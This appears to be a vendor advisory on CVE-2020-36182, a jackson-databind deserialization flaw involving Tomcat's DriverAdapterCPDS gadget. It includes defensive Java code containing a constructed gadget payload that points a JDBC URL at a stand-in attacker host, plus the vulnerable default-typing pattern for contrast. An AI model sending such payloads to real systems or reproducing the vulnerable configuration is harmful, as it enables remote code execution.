CVE-2020-36182
Deserialization vulnerability in jackson-databind (Maven)

Category: Deserialization · Known exploits: none · Fixable by Resolved Security

What is CVE-2020-36182 About?

This is a deserialization vulnerability in FasterXML jackson-databind 2.x before 2.9.10.8 (and, on the 2.6 branch, before 2.6.7.5). The library mishandles the interaction between serialization gadgets and polymorphic typing; this CVE covers the gadget class `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS` from Tomcat's repackaged Commons DBCP 2. Exploitation can lead to remote code execution, but only when an attacker controls the serialized input, the application has polymorphic (default) typing enabled for the target field, and the gadget class is present on the classpath.

Affected Software

  • com.fasterxml.jackson.core:jackson-databind
    • >=2.0.0, <2.6.7.5
    • >=2.7.0, <2.9.10.8

Technical Details

The FasterXML jackson-databind library is prone to a deserialization flaw when polymorphic typing is enabled and the input names org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS as the concrete type. With default typing (or a field typed as Object or Serializable with type information enabled), Jackson instantiates whatever class the JSON type id names and invokes its setters with attacker-supplied values. DriverAdapterCPDS is a ConnectionPoolDataSource whose setters take a JDBC driver class name and a connection URL: setDriver() loads the named class via Class.forName(), and the URL is later handed to the JDBC driver when a connection is requested. A payload can therefore make the application load an attacker-chosen class and connect to an attacker-chosen JDBC URL; with a suitable driver on the classpath, this chain can be driven to arbitrary code execution on the server. Affected versions did not include this class in SubTypeValidator's denylist, so nothing stopped it from being used as a type id.
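The following added example (not code from the advisory, from Resolved Security, or from jackson-databind itself) shows the configuration that makes this gadget reachable and the allow-list configuration that rejects it; it also illustrates the prerequisites listed under exploitability below. The `Event` class, the `com.example.model.` package prefix, the driver class name and the JDBC URL in the constructed input are placeholders. It needs jackson-databind 2.10 or later for `BasicPolymorphicTypeValidator`; tomcat-dbcp does not have to be on the classpath to observe the rejection, because the type id is refused before any class is loaded.

```java
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DriverAdapterCpdsDemo {

    // Hypothetical application class. An Object-typed property is what lets a
    // type id in the input select an arbitrary class once default typing is on.
    public static class Event {
        public String name;
        public Object payload;
    }

    // Constructed input (not a captured exploit). The WRAPPER_ARRAY form
    // ["<class>", {...}] is what legacy enableDefaultTyping() accepts; the type
    // id names the gadget class from the CVE, and the property names match the
    // DriverAdapterCPDS setters. The values themselves are placeholders.
    static final String UNTRUSTED_JSON =
        "{\"name\":\"login\",\"payload\":["
        + "\"org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS\","
        + "{\"driver\":\"com.example.SomeDriver\","
        + "\"url\":\"jdbc:example://attacker.example/\"}]}";

    // Vulnerable pattern seen in affected deployments (2.9.x API, shown for
    // contrast only; do not use):
    //   ObjectMapper m = new ObjectMapper();
    //   m.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
    //   m.readValue(UNTRUSTED_JSON, Event.class);
    // On 2.9.x before 2.9.10.8 with tomcat-dbcp present, this instantiates
    // DriverAdapterCPDS and calls setDriver()/setUrl() with the attacker's values.

    // Hardened mapper: polymorphic typing is still enabled, but only subtypes
    // under an application-owned package prefix may be resolved from a type id.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.model.")   // hypothetical prefix
            .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL,
                                JsonTypeInfo.As.WRAPPER_ARRAY);
        return m;
    }

    // Returns true when the validator refuses the gadget type id, which is the
    // expected outcome for any class outside the allow-list.
    static boolean gadgetRejected(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Event.class);
            return false;
        } catch (InvalidTypeIdException e) {
            return true;
        } catch (Exception e) {
            // Any other failure means the class was resolved and construction
            // began; treat that as "not rejected" so the check stays strict.
            return false;
        }
    }

    public static void main(String[] args) {
        boolean rejected = gadgetRejected(hardenedMapper(), UNTRUSTED_JSON);
        System.out.println(rejected
            ? "Rejected: type id outside allow-list"
            : "UNEXPECTED: gadget type id was accepted");
    }
}
```

The allow-list is the durable fix: the denylist in SubTypeValidator only covers gadget classes that are already known, which is why this CVE has a dozen siblings. If default typing is not actually needed, leaving it disabled is better still; where `@JsonTypeInfo` is used on specific properties, `mapper.setPolymorphicTypeValidator(ptv)` applies the same allow-list to those.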

What is the Impact of CVE-2020-36182?

Successful exploitation may allow attackers to execute arbitrary code on the remote server, leading to potential complete system compromise, data theft, or denial of service.

What is the Exploitability of CVE-2020-36182?

Exploiting this vulnerability requires crafting a payload whose polymorphic type id names DriverAdapterCPDS and whose properties feed its setters. Complexity is moderate to high: the attacker needs an affected jackson-databind version, polymorphic (default) typing enabled on a reachable property, tomcat-dbcp (and a usable JDBC driver) on the classpath, and a working chain from the driver and URL setters to code execution. No authentication is inherently required if the deserialization endpoint is publicly reachable. The vulnerability is remote, typically triggered by submitting the crafted document in an HTTP request body that the application parses with jackson-databind (JSON, or another format layered on databind). Enabled default typing, fields declared as Object or Serializable, and the presence of DriverAdapterCPDS on the classpath are the key factors that make exploitation feasible.

What are the Known Public Exploits?

No public proof-of-concept exploits are known for this CVE.

What are the Available Fixes for CVE-2020-36182?

A Fix by Resolved Security Exists!
Fix open-source vulnerabilities without upgrading your dependencies.

About the Fix from Resolved Security

The patch adds several class names, including org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS, to the denylist in SubTypeValidator so that Jackson refuses them as polymorphic type ids. This directly mitigates CVE-2020-36182, which can lead to remote code execution through unsafe polymorphic deserialization of this class; explicitly blocking the class closes this attack vector without changing the dependency version.

Available Upgrade Options

  • com.fasterxml.jackson.core:jackson-databind
    • >=2.0.0, <2.6.7.5 → Upgrade to 2.6.7.5
  • com.fasterxml.jackson.core:jackson-databind
    • >=2.7.0, <2.9.10.8 → Upgrade to 2.9.10.8


Additional Resources

What are Similar Vulnerabilities to CVE-2020-36182?

Similar Vulnerabilities: CVE-2020-24750, CVE-2020-36184, CVE-2020-24616, CVE-2019-12814, CVE-2019-14540